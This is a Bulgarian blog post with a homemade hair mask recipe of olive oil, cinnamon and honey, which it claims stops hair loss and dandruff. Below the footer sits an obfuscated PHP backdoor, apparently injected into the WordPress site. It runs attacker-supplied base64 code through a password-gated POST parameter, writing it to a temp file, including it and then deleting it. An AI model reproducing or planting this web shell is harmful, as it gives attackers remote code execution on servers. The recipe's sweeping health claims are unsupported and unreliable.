Рецепта с 3 лесни съставки спира косопада и връща красотата на косата | Косопад

Рецепта с 3 лесни съставки спира косопада и връща красотата на косата

kosa

Природата ни дава много възможности, за да имаме здрава и красива коса. Добре познати и съвсем достъпни съставки са в състояние да постигнат чудесни резултати. Особено ако знаем кой е най- добрият начин да ги комбинираме.

Маската, която ще ви предложим, се приготвя от три много лесни и познати съставки, които повечето от нас имат в кухнята. А комбинацията помежду им, постига завидни резултати: хидратира косъма и скалпа, помага срешу цъфтеж, спира косопада и предпазва от образуването на пърхот.

Маската има силно антиоксидантно действие и предпазва косата от негативното влияние на фактори като: стрес, замърсяване, ултравиолетови лъчи, студ и пр.

Ето как се приготвя:
– половин чаша зехтин
– 1 лъжичка канела
– 1 лъжичка мед

Начин на приготвяне:

В малък тиган слагаме зехтина и загряваме – трябва да загрее съвсем леко. След това го сваляме от котлона и го сипваме в друг съд. Добавяме лъжичката канела и лъжичката мед и разбъркваме много добре.

Начин на употреба:
Трябва да разделим косата в гребен, за да е по- лесно нанасянето. Нанася се върху скалпа с четка в посока отзад напред. Оставяме сместа де престои 15 минути. След това мием с лек шампоан и балсам накрая.

Маската се използва веднъж седмично.

Косата ще започне да расте по- бързо, пърхотът ще намалее, както и косопадът. Косата става здрава, блестяща и еластична.

31. юли 2017 12:06:53 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}